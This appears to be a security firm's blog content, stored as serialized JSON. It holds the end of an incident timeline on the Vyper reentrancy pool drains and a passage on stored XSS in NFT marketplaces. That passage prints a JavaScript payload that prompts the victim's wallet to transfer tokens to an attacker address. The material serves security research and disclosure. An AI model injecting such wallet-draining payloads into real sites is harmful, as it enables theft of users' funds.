True\n",{"type":27,"tag":207,"props":37975,"children":37976},{"class":209,"line":445},[37977],{"type":27,"tag":207,"props":37978,"children":37979},{"emptyLinePlaceholder":19},[37980],{"type":33,"value":2062},{"type":27,"tag":207,"props":37982,"children":37983},{"class":209,"line":867},[37984],{"type":27,"tag":207,"props":37985,"children":37986},{"style":1335},[37987],{"type":33,"value":37905},{"type":27,"tag":207,"props":37989,"children":37990},{"class":209,"line":892},[37991,37995,37999,38003],{"type":27,"tag":207,"props":37992,"children":37993},{"style":1335},[37994],{"type":33,"value":37913},{"type":27,"tag":207,"props":37996,"children":37997},{"style":238},[37998],{"type":33,"value":1343},{"type":27,"tag":207,"props":38000,"children":38001},{"style":1325},[38002],{"type":33,"value":37922},{"type":27,"tag":207,"props":38004,"children":38005},{"style":238},[38006],{"type":33,"value":10449},{"type":27,"tag":207,"props":38008,"children":38009},{"class":209,"line":1475},[38010,38014,38019,38023,38027,38031,38035],{"type":27,"tag":207,"props":38011,"children":38012},{"style":214},[38013],{"type":33,"value":37934},{"type":27,"tag":207,"props":38015,"children":38016},{"style":1335},[38017],{"type":33,"value":38018}," test2",{"type":27,"tag":207,"props":38020,"children":38021},{"style":238},[38022],{"type":33,"value":1343},{"type":27,"tag":207,"props":38024,"children":38025},{"style":220},[38026],{"type":33,"value":37948},{"type":27,"tag":207,"props":38028,"children":38029},{"style":238},[38030],{"type":33,"value":37953},{"type":27,"tag":207,"props":38032,"children":38033},{"style":8920},[38034],{"type":33,"value":36947},{"type":27,"tag":207,"props":38036,"children":38037},{"style":238},[38038],{"type":33,"value":12851},{"type":27,"tag":207,"props":38040,"children":38041},{"class":209,"line":2065},[38042,38046],{"type":27,"tag":207,"props":38043,"children":38044},{"style":376},[38045],{"type":33,"value":8986},{"type":27,"tag":207,"props":38047,"children":38048},{"style":214},[38049],{"type":33,"value":38050}," False\n",{"type":27,"tag":36,"props":38052,"children":38053},{},[38054],{"type":33,"value":38055},"This was not just another reentrancy bug.",{"type":27,"tag":36,"props":38057,"children":38058},{},[38059],{"type":33,"value":38060},"At this point, we realized just how impactful this would be. There was a blackout of information, and we deleted public messages on the nature of the vulnerability.",{"type":27,"tag":36,"props":38062,"children":38063},{},[38064,38069],{"type":27,"tag":12606,"props":38065,"children":38066},{},[38067],{"type":33,"value":38068},"14:37 UTC",{"type":33,"value":38070}," Wavey helped identify the vulnerable commit and affected versions. This was also confirmed by me and Charles by manually inspecting the Vyper compiler output.",{"type":27,"tag":36,"props":38072,"children":38073},{},[38074],{"type":27,"tag":126,"props":38075,"children":38077},{"alt":7,"src":38076},"/posts/vyper-timeline/sstore.png",[],{"type":27,"tag":36,"props":38079,"children":38080},{},[38081],{"type":33,"value":38082},"It was a race with the hackers.",{"type":27,"tag":36,"props":38084,"children":38085},{},[38086],{"type":33,"value":38087},"Thankfully, people were still confusing this for read-only reentrancy. Taken from the \"Web3 Security Alerts\" channel.",{"type":27,"tag":10222,"props":38089,"children":38090},{},[38091],{"type":27,"tag":36,"props":38092,"children":38093},{},[38094,38096],{"type":33,"value":38095},"Alchemix and Metronome DAO also been hacked due to this read-only reentrancy bug: ",{"type":27,"tag":47,"props":38097,"children":38100},{"href":38098,"rel":38099},"https://twitter.com/hexagate_/status/1685677801813217280",[51],[38101],{"type":33,"value":38098},{"type":27,"tag":36,"props":38103,"children":38104},{},[38105],{"type":33,"value":38106},"Michael identified alETH and msETH pools, which were also running 0.2.15, as being also potentially vulnerable.",{"type":27,"tag":36,"props":38108,"children":38109},{},[38110,38115,38116,38123],{"type":27,"tag":12606,"props":38111,"children":38112},{},[38113],{"type":33,"value":38114},"14:50 UTC",{"type":33,"value":13740},{"type":27,"tag":47,"props":38117,"children":38120},{"href":38118,"rel":38119},"https://etherscan.io/tx/0xc93eb238ff42632525e990119d3edc7775299a70b56e54d83ec4f53736400964",[51],[38121],{"type":33,"value":38122},"msETH/ETH was drained",{"type":33,"value":1041},{"type":27,"tag":36,"props":38125,"children":38126},{},[38127,38132,38133,38140],{"type":27,"tag":12606,"props":38128,"children":38129},{},[38130],{"type":33,"value":38131},"15:34 UTC",{"type":33,"value":13740},{"type":27,"tag":47,"props":38134,"children":38137},{"href":38135,"rel":38136},"https://etherscan.io/tx/0xb676d789bb8b66a08105c844a49c2bcffb400e5c1cfabd4bc30cca4bff3c9801",[51],[38138],{"type":33,"value":38139},"alETH/ETH was drained",{"type":33,"value":1041},{"type":27,"tag":36,"props":38142,"children":38143},{},[38144,38149,38151,38158],{"type":27,"tag":12606,"props":38145,"children":38146},{},[38147],{"type":33,"value":38148},"15:43 UTC",{"type":33,"value":38150}," We identified that ",{"type":27,"tag":47,"props":38152,"children":38155},{"href":38153,"rel":38154},"https://etherscan.io/address/0x8301AE4fc9c624d1D396cbDAa1ed877821D7C511#code",[51],[38156],{"type":33,"value":38157},"CRV/ETH was vulnerable",{"type":33,"value":38159},", compiled using Vyper version 3.0.0. It was critical that we kept the nature of affected contracts secret for as long as possible.",{"type":27,"tag":36,"props":38161,"children":38162},{},[38163,38168],{"type":27,"tag":12606,"props":38164,"children":38165},{},[38166],{"type":33,"value":38167},"16:11 UTC",{"type":33,"value":38169}," We began working on a whitehat exploit.",{"type":27,"tag":36,"props":38171,"children":38172},{},[38173,38175,38182],{"type":33,"value":38174},"Unfortunately, too many groups were doing independent research in parallel and rumors were spreading. At 16:44 UTC, we decided to release a ",{"type":27,"tag":47,"props":38176,"children":38179},{"href":38177,"rel":38178},"https://twitter.com/vyperlang/status/1685692973051498497",[51],[38180],{"type":33,"value":38181},"public statement on affected versions",{"type":33,"value":1041},{"type":27,"tag":36,"props":38184,"children":38185},{},[38186],{"type":33,"value":38187},"By 18:32 UTC, we had a proof of concept exploit to be used in a potential whitehat recovery. bpak from Chainlight was also working on an exploit in parallel, and shared it at 19:06 UTC.",{"type":27,"tag":36,"props":38189,"children":38190},{},[38191,38193,38200],{"type":33,"value":38192},"Five minutes later at 19:11 UTC, ",{"type":27,"tag":47,"props":38194,"children":38197},{"href":38195,"rel":38196},"https://etherscan.io/tx/0x2e7dc8b2fb7e25fd00ed9565dcc0ad4546363171d5e00f196d48103983ae477c",[51],[38198],{"type":33,"value":38199},"somebody else stole the funds",{"type":33,"value":1041},{"type":27,"tag":36,"props":38202,"children":38203},{},[38204],{"type":33,"value":38205},"The attack structure was largely different from either of our proofs of concept, so it was unlikely to have been a leak from our group. Regardless, this was pretty demoralizing.",{"type":27,"tag":36,"props":38207,"children":38208},{},[38209],{"type":33,"value":38210},"Nevertheless, there was more ground to cover.",{"type":27,"tag":36,"props":38212,"children":38213},{},[38214,38219],{"type":27,"tag":12606,"props":38215,"children":38216},{},[38217],{"type":33,"value":38218},"21:26 UTC",{"type":33,"value":38220}," Addison proposed an ambitious plan to recover the remaining assets in the CRVETH pool.",{"type":27,"tag":10222,"props":38222,"children":38223},{},[38224],{"type":27,"tag":36,"props":38225,"children":38226},{},[38227,38229,38233,38235,38238,38240,38243,38245],{"type":33,"value":38228},"if you send like 30k crv to the crv/eth pool ",{"type":27,"tag":38230,"props":38231,"children":38232},"br",{},[],{"type":33,"value":38234},"\nyou can then update admin fee ",{"type":27,"tag":38230,"props":38236,"children":38237},{},[],{"type":33,"value":38239},"\nand then the crv/eth rate is like .15 eth per crv ",{"type":27,"tag":38230,"props":38241,"children":38242},{},[],{"type":33,"value":38244},"\nso you can basically drain whole pool for few hundred K crv ",{"type":27,"tag":38230,"props":38246,"children":38247},{},[],{"type":27,"tag":36,"props":38249,"children":38250},{},[38251,38256],{"type":27,"tag":12606,"props":38252,"children":38253},{},[38254],{"type":33,"value":38255},"21:52 UTC",{"type":33,"value":38257}," bpak had produced a working proof of concept which could recover 3100 ETH.",{"type":27,"tag":36,"props":38259,"children":38260},{},[38261,38263,38270,38272,38279,38287],{"type":33,"value":38262},"Ten minutes later at 22:02 UTC, we were beaten again. By some freak concidence, the ",{"type":27,"tag":47,"props":38264,"children":38267},{"href":38265,"rel":38266},"https://etherscan.io/address/0x8c73d39b2da2dd1a10cc16502bc7c8d768ec74c9",[51],[38268],{"type":33,"value":38269},"CRV admin fee bot",{"type":33,"value":38271}," had claimed fees and ",{"type":27,"tag":47,"props":38273,"children":38276},{"href":38274,"rel":38275},"https://etherscan.io/tx/0xcd99fadd7e28a42a063e07d9d86f67c88e10a7afe5921bd28cd1124924ae2052",[51],[38277],{"type":33,"value":38278},"the pool was drained",{"type":27,"tag":22749,"props":38280,"children":38281},{},[38282],{"type":27,"tag":47,"props":38283,"children":38285},{"href":36885,"ariaDescribedBy":38284,"dataFootnoteRef":7,"id":36887},[22756],[38286],{"type":33,"value":1651},{"type":33,"value":1041},{"type":27,"tag":28,"props":38289,"children":38291},{"id":38290},"blame",[38292],{"type":33,"value":38293},"Blame",{"type":27,"tag":36,"props":38295,"children":38296},{},[38297,38301],{"type":27,"tag":942,"props":38298,"children":38299},{},[38300],{"type":33,"value":38293},{"type":33,"value":38302}," is a strong word. It's not productive to point fingers. At the same time, I think it's useful to think about what could have went better.",{"type":27,"tag":58,"props":38304,"children":38306},{"id":38305},"races",[38307],{"type":33,"value":38308},"Races",{"type":27,"tag":36,"props":38310,"children":38311},{},[38312],{"type":33,"value":38313},"In both cases, whitehat efforts were beaten by less than half an hour. Sometimes every second really does count.",{"type":27,"tag":36,"props":38315,"children":38316},{},[38317],{"type":33,"value":38318},"There likely could have been better preparation and resources for executing on these attacks. At the same time, this seems like a double-edged sword. Is it really a good idea to aggregate information related how to execute a hack? Who should we trust?",{"type":27,"tag":36,"props":38320,"children":38321},{},[38322],{"type":33,"value":38323},"On the other hand, I think the process was quite efficient. We went from initial suspicions to identifying vulnerable variants in 2 hours and 4 minutes.",{"type":27,"tag":58,"props":38325,"children":38327},{"id":38326},"information-leakage",[38328],{"type":33,"value":38329},"Information Leakage",{"type":27,"tag":36,"props":38331,"children":38332},{},[38333],{"type":33,"value":38334},"I was both an auditor and a whitehat.",{"type":27,"tag":36,"props":38336,"children":38337},{},[38338,38340,38347],{"type":33,"value":38339},"There's a strong culture of publishing in auditing. We're paid for technical thought leadership and deep understanding of vulnerabilities. One way to demonstrate this is ",{"type":27,"tag":47,"props":38341,"children":38344},{"href":38342,"rel":38343},"https://twitter.com/osec_io/status/1579969927020412929",[51],[38345],{"type":33,"value":38346},"by publishing the \"scoop\"",{"type":33,"value":38348}," on hacks in the wild. Researchers cost a lot and the return on investment is publicity.",{"type":27,"tag":36,"props":38350,"children":38351},{},[38352],{"type":33,"value":38353},"On the other hand, there's a compelling argument that early disclosure of the affected versions had a material impact on the whitehat recovery.",{"type":27,"tag":36,"props":38355,"children":38356},{},[38357],{"type":33,"value":38358},"Half an hour more could have saved $18M.",{"type":27,"tag":36,"props":38360,"children":38361},{},[38362],{"type":33,"value":38363},"Auditors don't pay for externalities created by their reporting. Instead, they get rewarded with likes, retweets, and publicity. Seems like a hard problem.",{"type":27,"tag":28,"props":38365,"children":38367},{"id":38366},"next-steps",[38368],{"type":33,"value":38369},"Next Steps",{"type":27,"tag":36,"props":38371,"children":38372},{},[38373],{"type":33,"value":38374},"I disagree with takes like \"we need formal verification to solve this\". This bug could have been caught with a unit test. Formal verification is very useful for many bug classes, but I'm not convinced it's as useful for relatively simple, non-optimizing compilers.",{"type":27,"tag":36,"props":38376,"children":38377},{},[38378,38380,38387],{"type":33,"value":38379},"It's important to note that this bug ",{"type":27,"tag":47,"props":38381,"children":38384},{"href":38382,"rel":38383},"https://twitter.com/real_philogy/status/1685948253139857409",[51],[38385],{"type":33,"value":38386},"was patched since November 2021",{"type":33,"value":1041},{"type":27,"tag":10222,"props":38389,"children":38390},{},[38391],{"type":27,"tag":36,"props":38392,"children":38393},{},[38394,38396,38401,38402,38405,38407,38412],{"type":33,"value":38395},"I think this Vyper 0day is less about the skill of the Vyper team or the language itself but more about ",{"type":27,"tag":942,"props":38397,"children":38398},{},[38399],{"type":33,"value":38400},"processes",{"type":33,"value":1055},{"type":27,"tag":38230,"props":38403,"children":38404},{},[],{"type":33,"value":38406},"\nThe bug was a fixed many versions of Vyper ago, the actual oversight was not realizing the potential impact to projects at the time it ",{"type":27,"tag":942,"props":38408,"children":38409},{},[38410],{"type":33,"value":38411},"was",{"type":33,"value":38413}," fixed.",{"type":27,"tag":36,"props":38415,"children":38416},{},[38417],{"type":33,"value":38418},"Unfortunately, public goods get easily forgotten. With immutable contracts, projects can have implicit dependencies on code written years ago. Protocol developers and security experts should stay up to date on security developments across the entire execution stack.",{"type":27,"tag":25692,"props":38420,"children":38422},{"className":38421,"dataFootnotes":7},[25695],[38423,38428],{"type":27,"tag":28,"props":38424,"children":38426},{"className":38425,"id":22756},[25700],[38427],{"type":33,"value":25703},{"type":27,"tag":12719,"props":38429,"children":38430},{},[38431],{"type":27,"tag":1232,"props":38432,"children":38433},{"id":37627},[38434,38436],{"type":33,"value":38435},"Thankfully, these funds were later returned. ",{"type":27,"tag":47,"props":38437,"children":38439},{"href":37655,"ariaLabel":25805,"className":38438,"dataFootnoteBackref":7},[25807],[38440],{"type":33,"value":25810},{"type":27,"tag":10127,"props":38442,"children":38443},{},[38444],{"type":33,"value":10131},{"title":7,"searchDepth":244,"depth":244,"links":38446},[38447,38448,38452,38453],{"id":37722,"depth":244,"text":37725},{"id":38290,"depth":244,"text":38293,"children":38449},[38450,38451],{"id":38305,"depth":270,"text":38308},{"id":38326,"depth":270,"text":38329},{"id":38366,"depth":244,"text":38369},{"id":22756,"depth":244,"text":25703},"content:blog:2023-08-01-vyper-timeline.md","blog/2023-08-01-vyper-timeline.md","blog/2023-08-01-vyper-timeline",{"_path":38458,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":38459,"description":38460,"author":38461,"image":38464,"date":38466,"isFeatured":19,"tags":38467,"onBlogPage":19,"body":38470,"_type":10152,"_id":42672,"_source":10154,"_file":42673,"_stem":42674,"_extension":10157},"/blog/2023-08-11-web2-bug-repellant-instructions","Web2 Bug Repellant Instructions","An analysis of security risks that don’t get enough attention - web2 bugs in web3 apps. We take a deep and practical look at vulnerabilities across various applications.",[38462,38463],"caue","bruno",{"src":38465,"height":18,"width":18},"/posts/web2-bug-repellant-instructions/web2-bug-repellant-instructions.jpg","2023-08-11",[38468,38469],"nft-marketplaces","xss",{"type":24,"children":38471,"toc":42655},[38472,38476,38481,38485,38490,38495,38500,38516,38522,38535,38557,38564,38569,38576,38581,38587,38592,38597,38602,38607,38618,38623,39587,39597,39609,39616,39621,40440,40445,40450,40455,40460,41244,41249,41331,41336,41405,41411,41416,41421,41648,41661,41666,41671,41676,41683,41688,41695,41701,41706,41711,41716,42035,42040,42046,42062,42068,42073,42078,42088,42093,42098,42107,42112,42118,42134,42147,42152,42157,42177,42184,42189,42196,42205,42210,42231,42284,42289,42339,42353,42358,42372,42485,42508,42592,42615,42620,42625,42630,42635,42640,42646,42651],{"type":27,"tag":28,"props":38473,"children":38474},{"id":30},[38475],{"type":33,"value":34},{"type":27,"tag":36,"props":38477,"children":38478},{},[38479],{"type":33,"value":38480},"Transitioning to a fully decentralized web is hard. Many Web 3 applications still have large, unexplored Web 2 attack surfaces.",{"type":27,"tag":58,"props":38482,"children":38483},{"id":10207},[38484],{"type":33,"value":10210},{"type":27,"tag":36,"props":38486,"children":38487},{},[38488],{"type":33,"value":38489},"In this blog post, we'll explore these lingering threats and potential mitigations. This work summarizes our internal research against various applications, from NFT marketplaces to wallets to protocol frontends.",{"type":27,"tag":36,"props":38491,"children":38492},{},[38493],{"type":33,"value":38494},"As a note, generally applications with non-trivial frontends are more susceptible to these vulnerabilities. Hence, a lot of our research focused on the interactions with NFTs, an ideal Web 2.5 candidate in many senses.",{"type":27,"tag":28,"props":38496,"children":38497},{"id":38469},[38498],{"type":33,"value":38499},"XSS",{"type":27,"tag":36,"props":38501,"children":38502},{},[38503],{"type":27,"tag":942,"props":38504,"children":38505},{},[38506,38508,38515],{"type":33,"value":38507},"I cannot make you understand. I cannot make anyone understand what is happening inside me. I cannot ",{"type":27,"tag":47,"props":38509,"children":38512},{"href":38510,"rel":38511},"https://developer.mozilla.org/en-US/docs/Glossary/Cross-site_scripting",[51],[38513],{"type":33,"value":38514},"even explain it to myself",{"type":33,"value":1041},{"type":27,"tag":58,"props":38517,"children":38519},{"id":38518},"managing-metadata",[38520],{"type":33,"value":38521},"Managing Metadata",{"type":27,"tag":36,"props":38523,"children":38524},{},[38525,38527,38534],{"type":33,"value":38526},"Effectively managing metadata is a challenge. When improperly sanitized, unsuspecting metadata becomes a dangerous sink for malicious ",{"type":27,"tag":47,"props":38528,"children":38531},{"href":38529,"rel":38530},"https://www.vice.com/en/article/xgdvaz/nft-steal-ip-address-opensea",[51],[38532],{"type":33,"value":38533},"payloads",{"type":33,"value":1041},{"type":27,"tag":36,"props":38536,"children":38537},{},[38538,38540,38547,38549,38555],{"type":33,"value":38539},"We showcase this vulnerability in the ",{"type":27,"tag":47,"props":38541,"children":38544},{"href":38542,"rel":38543},"https://rocki.com/",[51],[38545],{"type":33,"value":38546},"Rocki Marketplace",{"type":33,"value":38548},". The ",{"type":27,"tag":84,"props":38550,"children":38552},{"className":38551},[],[38553],{"type":33,"value":38554},"artistDescription",{"type":33,"value":38556}," parameter was improperly sanitized, allowing arbitrary HTML input without any validation checks!",{"type":27,"tag":36,"props":38558,"children":38559},{},[38560],{"type":27,"tag":126,"props":38561,"children":38563},{"alt":7,"src":38562},"/posts/web2-bug-repellant-instructions/metadata.png",[],{"type":27,"tag":36,"props":38565,"children":38566},{},[38567],{"type":33,"value":38568},"When a user loads such a maliciously constructed NFT, they'll unwittingly execute our payload, giving us full control over their account.",{"type":27,"tag":36,"props":38570,"children":38571},{},[38572],{"type":27,"tag":126,"props":38573,"children":38575},{"alt":7,"src":38574},"/posts/web2-bug-repellant-instructions/xss.png",[],{"type":27,"tag":36,"props":38577,"children":38578},{},[38579],{"type":33,"value":38580},"Of course, this is merely a toy payload. An actual hacker could use this to spread through the marketplace, creating a wormable payload that takes over the entire website.",{"type":27,"tag":58,"props":38582,"children":38584},{"id":38583},"wheres-my-wallet",[38585],{"type":33,"value":38586},"Where's My Wallet",{"type":27,"tag":36,"props":38588,"children":38589},{},[38590],{"type":33,"value":38591},"What's the worst that can happen? How does losing your wallet funds sound?",{"type":27,"tag":36,"props":38593,"children":38594},{},[38595],{"type":33,"value":38596},"Note that triggering this exploit requires some interaction. However, in practice users likely are not carefully examining the wallet prompts, especially on familiar sites.",{"type":27,"tag":36,"props":38598,"children":38599},{},[38600],{"type":33,"value":38601},"It is important to recognize that the presence of XSS in marketplaces can trigger the approval prompt in various wallets, including the attacker's assets.",{"type":27,"tag":36,"props":38603,"children":38604},{},[38605],{"type":33,"value":38606},"In the following example, this malicious transaction was initiated by a malicious code injected into rocki.com.",{"type":27,"tag":38608,"props":38609,"children":38611},"div",{"style":38610},"display:flex; align-items:center; flex-direction:column;",[38612],{"type":27,"tag":126,"props":38613,"children":38617},{"src":38614,"alt":38615,"style":38616},"/posts/web2-bug-repellant-instructions/metamask.png","Wallet","max-height:550px;",[],{"type":27,"tag":36,"props":38619,"children":38620},{},[38621],{"type":33,"value":38622},"And here we can find the code used to achieve it :",{"type":27,"tag":101,"props":38624,"children":38626},{"className":201,"code":38625,"language":200,"meta":7,"style":7},"function request() {\n if (typeof window.ethereum === 'undefined') {\n console.error('Please install MetaMask to use this feature.');\n } else {\n ethereum.request({ method: 'eth_requestAccounts' }).then((accounts) => {\n const fromAddress = accounts[0];\n const attackerAddress = '0x0000000000000000000000000000000000000000';\n const contractAddress = '0xa01000c52b234a92563ba61e5649b7c76e1ba0f3';\n\n let tokenAbi = [\n {\n constant: false,\n inputs: [\n {\n name: '_to',\n type: 'address',\n },\n {\n name: '_value',\n type: 'uint256',\n },\n ],\n name: 'transfer',\n outputs: [\n {\n name: '',\n type: 'bool',\n },\n ],\n type: 'function',\n },\n ];\n\n const web3 = new Web3(window.ethereum);\n\n const tokenContract = new web3.eth.Contract(tokenAbi, contractAddress);\n\n const transactionObject = {\n from: fromAddress,\n to: contractAddress,\n data: tokenContract.methods\n .transfer(attackerAddress, web3.utils.toWei('100000000', 'ether'))\n .encodeABI(),\n };\n\n web3.eth.sendTransaction(transactionObject);\n });\n }\n}\n\nimport('https://cdn.jsdelivr.net/gh/ethereum/web3.js@1.0.0-beta.36/dist/web3.min.js');\nsetTimeout(request, 1e3);\n",[38627],{"type":27,"tag":84,"props":38628,"children":38629},{"__ignoreMap":7},[38630,38647,38692,38721,38737,38800,38835,38860,38885,38892,38912,38920,38936,38948,38956,38973,38990,38998,39005,39021,39037,39044,39052,39069,39081,39088,39104,39120,39127,39134,39151,39158,39166,39173,39219,39226,39290,39297,39317,39333,39349,39370,39441,39457,39464,39471,39509,39517,39524,39531,39538,39558],{"type":27,"tag":207,"props":38631,"children":38632},{"class":209,"line":210},[38633,38638,38643],{"type":27,"tag":207,"props":38634,"children":38635},{"style":214},[38636],{"type":33,"value":38637},"function",{"type":27,"tag":207,"props":38639,"children":38640},{"style":1335},[38641],{"type":33,"value":38642}," request",{"type":27,"tag":207,"props":38644,"children":38645},{"style":238},[38646],{"type":33,"value":23011},{"type":27,"tag":207,"props":38648,"children":38649},{"class":209,"line":244},[38650,38655,38659,38664,38669,38673,38678,38683,38688],{"type":27,"tag":207,"props":38651,"children":38652},{"style":376},[38653],{"type":33,"value":38654}," if",{"type":27,"tag":207,"props":38656,"children":38657},{"style":238},[38658],{"type":33,"value":686},{"type":27,"tag":207,"props":38660,"children":38661},{"style":214},[38662],{"type":33,"value":38663},"typeof",{"type":27,"tag":207,"props":38665,"children":38666},{"style":220},[38667],{"type":33,"value":38668}," window",{"type":27,"tag":207,"props":38670,"children":38671},{"style":238},[38672],{"type":33,"value":1041},{"type":27,"tag":207,"props":38674,"children":38675},{"style":220},[38676],{"type":33,"value":38677},"ethereum",{"type":27,"tag":207,"props":38679,"children":38680},{"style":226},[38681],{"type":33,"value":38682}," ===",{"type":27,"tag":207,"props":38684,"children":38685},{"style":1325},[38686],{"type":33,"value":38687}," 'undefined'",{"type":27,"tag":207,"props":38689,"children":38690},{"style":238},[38691],{"type":33,"value":1424},{"type":27,"tag":207,"props":38693,"children":38694},{"class":209,"line":270},[38695,38700,38704,38708,38712,38717],{"type":27,"tag":207,"props":38696,"children":38697},{"style":220},[38698],{"type":33,"value":38699}," console",{"type":27,"tag":207,"props":38701,"children":38702},{"style":238},[38703],{"type":33,"value":1041},{"type":27,"tag":207,"props":38705,"children":38706},{"style":1335},[38707],{"type":33,"value":22138},{"type":27,"tag":207,"props":38709,"children":38710},{"style":238},[38711],{"type":33,"value":1343},{"type":27,"tag":207,"props":38713,"children":38714},{"style":1325},[38715],{"type":33,"value":38716},"'Please install MetaMask to use this feature.'",{"type":27,"tag":207,"props":38718,"children":38719},{"style":238},[38720],{"type":33,"value":1455},{"type":27,"tag":207,"props":38722,"children":38723},{"class":209,"line":296},[38724,38729,38733],{"type":27,"tag":207,"props":38725,"children":38726},{"style":238},[38727],{"type":33,"value":38728}," } ",{"type":27,"tag":207,"props":38730,"children":38731},{"style":376},[38732],{"type":33,"value":10605},{"type":27,"tag":207,"props":38734,"children":38735},{"style":238},[38736],{"type":33,"value":384},{"type":27,"tag":207,"props":38738,"children":38739},{"class":209,"line":445},[38740,38745,38749,38754,38759,38764,38769,38774,38779,38784,38788,38792,38796],{"type":27,"tag":207,"props":38741,"children":38742},{"style":220},[38743],{"type":33,"value":38744}," ethereum",{"type":27,"tag":207,"props":38746,"children":38747},{"style":238},[38748],{"type":33,"value":1041},{"type":27,"tag":207,"props":38750,"children":38751},{"style":1335},[38752],{"type":33,"value":38753},"request",{"type":27,"tag":207,"props":38755,"children":38756},{"style":238},[38757],{"type":33,"value":38758},"({ ",{"type":27,"tag":207,"props":38760,"children":38761},{"style":220},[38762],{"type":33,"value":38763},"method:",{"type":27,"tag":207,"props":38765,"children":38766},{"style":1325},[38767],{"type":33,"value":38768}," 'eth_requestAccounts'",{"type":27,"tag":207,"props":38770,"children":38771},{"style":238},[38772],{"type":33,"value":38773}," }).",{"type":27,"tag":207,"props":38775,"children":38776},{"style":1335},[38777],{"type":33,"value":38778},"then",{"type":27,"tag":207,"props":38780,"children":38781},{"style":238},[38782],{"type":33,"value":38783},"((",{"type":27,"tag":207,"props":38785,"children":38786},{"style":220},[38787],{"type":33,"value":21951},{"type":27,"tag":207,"props":38789,"children":38790},{"style":238},[38791],{"type":33,"value":2222},{"type":27,"tag":207,"props":38793,"children":38794},{"style":214},[38795],{"type":33,"value":2321},{"type":27,"tag":207,"props":38797,"children":38798},{"style":238},[38799],{"type":33,"value":384},{"type":27,"tag":207,"props":38801,"children":38802},{"class":209,"line":867},[38803,38808,38813,38817,38822,38826,38830],{"type":27,"tag":207,"props":38804,"children":38805},{"style":214},[38806],{"type":33,"value":38807}," const",{"type":27,"tag":207,"props":38809,"children":38810},{"style":220},[38811],{"type":33,"value":38812}," fromAddress",{"type":27,"tag":207,"props":38814,"children":38815},{"style":226},[38816],{"type":33,"value":229},{"type":27,"tag":207,"props":38818,"children":38819},{"style":220},[38820],{"type":33,"value":38821}," accounts",{"type":27,"tag":207,"props":38823,"children":38824},{"style":238},[38825],{"type":33,"value":11019},{"type":27,"tag":207,"props":38827,"children":38828},{"style":232},[38829],{"type":33,"value":1660},{"type":27,"tag":207,"props":38831,"children":38832},{"style":238},[38833],{"type":33,"value":38834},"];\n",{"type":27,"tag":207,"props":38836,"children":38837},{"class":209,"line":892},[38838,38842,38847,38851,38856],{"type":27,"tag":207,"props":38839,"children":38840},{"style":214},[38841],{"type":33,"value":38807},{"type":27,"tag":207,"props":38843,"children":38844},{"style":220},[38845],{"type":33,"value":38846}," attackerAddress",{"type":27,"tag":207,"props":38848,"children":38849},{"style":226},[38850],{"type":33,"value":229},{"type":27,"tag":207,"props":38852,"children":38853},{"style":1325},[38854],{"type":33,"value":38855}," '0x0000000000000000000000000000000000000000'",{"type":27,"tag":207,"props":38857,"children":38858},{"style":238},[38859],{"type":33,"value":241},{"type":27,"tag":207,"props":38861,"children":38862},{"class":209,"line":1475},[38863,38867,38872,38876,38881],{"type":27,"tag":207,"props":38864,"children":38865},{"style":214},[38866],{"type":33,"value":38807},{"type":27,"tag":207,"props":38868,"children":38869},{"style":220},[38870],{"type":33,"value":38871}," contractAddress",{"type":27,"tag":207,"props":38873,"children":38874},{"style":226},[38875],{"type":33,"value":229},{"type":27,"tag":207,"props":38877,"children":38878},{"style":1325},[38879],{"type":33,"value":38880}," '0xa01000c52b234a92563ba61e5649b7c76e1ba0f3'",{"type":27,"tag":207,"props":38882,"children":38883},{"style":238},[38884],{"type":33,"value":241},{"type":27,"tag":207,"props":38886,"children":38887},{"class":209,"line":2065},[38888],{"type":27,"tag":207,"props":38889,"children":38890},{"emptyLinePlaceholder":19},[38891],{"type":33,"value":2062},{"type":27,"tag":207,"props":38893,"children":38894},{"class":209,"line":2092},[38895,38899,38904,38908],{"type":27,"tag":207,"props":38896,"children":38897},{"style":214},[38898],{"type":33,"value":15356},{"type":27,"tag":207,"props":38900,"children":38901},{"style":220},[38902],{"type":33,"value":38903}," tokenAbi",{"type":27,"tag":207,"props":38905,"children":38906},{"style":226},[38907],{"type":33,"value":229},{"type":27,"tag":207,"props":38909,"children":38910},{"style":238},[38911],{"type":33,"value":32886},{"type":27,"tag":207,"props":38913,"children":38914},{"class":209,"line":2130},[38915],{"type":27,"tag":207,"props":38916,"children":38917},{"style":238},[38918],{"type":33,"value":38919}," {\n",{"type":27,"tag":207,"props":38921,"children":38922},{"class":209,"line":2168},[38923,38928,38932],{"type":27,"tag":207,"props":38924,"children":38925},{"style":220},[38926],{"type":33,"value":38927}," constant:",{"type":27,"tag":207,"props":38929,"children":38930},{"style":214},[38931],{"type":33,"value":16337},{"type":27,"tag":207,"props":38933,"children":38934},{"style":238},[38935],{"type":33,"value":1842},{"type":27,"tag":207,"props":38937,"children":38938},{"class":209,"line":4095},[38939,38944],{"type":27,"tag":207,"props":38940,"children":38941},{"style":220},[38942],{"type":33,"value":38943}," inputs:",{"type":27,"tag":207,"props":38945,"children":38946},{"style":238},[38947],{"type":33,"value":32886},{"type":27,"tag":207,"props":38949,"children":38950},{"class":209,"line":4103},[38951],{"type":27,"tag":207,"props":38952,"children":38953},{"style":238},[38954],{"type":33,"value":38955}," {\n",{"type":27,"tag":207,"props":38957,"children":38958},{"class":209,"line":4154},[38959,38964,38969],{"type":27,"tag":207,"props":38960,"children":38961},{"style":220},[38962],{"type":33,"value":38963}," name:",{"type":27,"tag":207,"props":38965,"children":38966},{"style":1325},[38967],{"type":33,"value":38968}," '_to'",{"type":27,"tag":207,"props":38970,"children":38971},{"style":238},[38972],{"type":33,"value":1842},{"type":27,"tag":207,"props":38974,"children":38975},{"class":209,"line":4203},[38976,38981,38986],{"type":27,"tag":207,"props":38977,"children":38978},{"style":220},[38979],{"type":33,"value":38980}," type:",{"type":27,"tag":207,"props":38982,"children":38983},{"style":1325},[38984],{"type":33,"value":38985}," 'address'",{"type":27,"tag":207,"props":38987,"children":38988},{"style":238},[38989],{"type":33,"value":1842},{"type":27,"tag":207,"props":38991,"children":38992},{"class":209,"line":4249},[38993],{"type":27,"tag":207,"props":38994,"children":38995},{"style":238},[38996],{"type":33,"value":38997}," 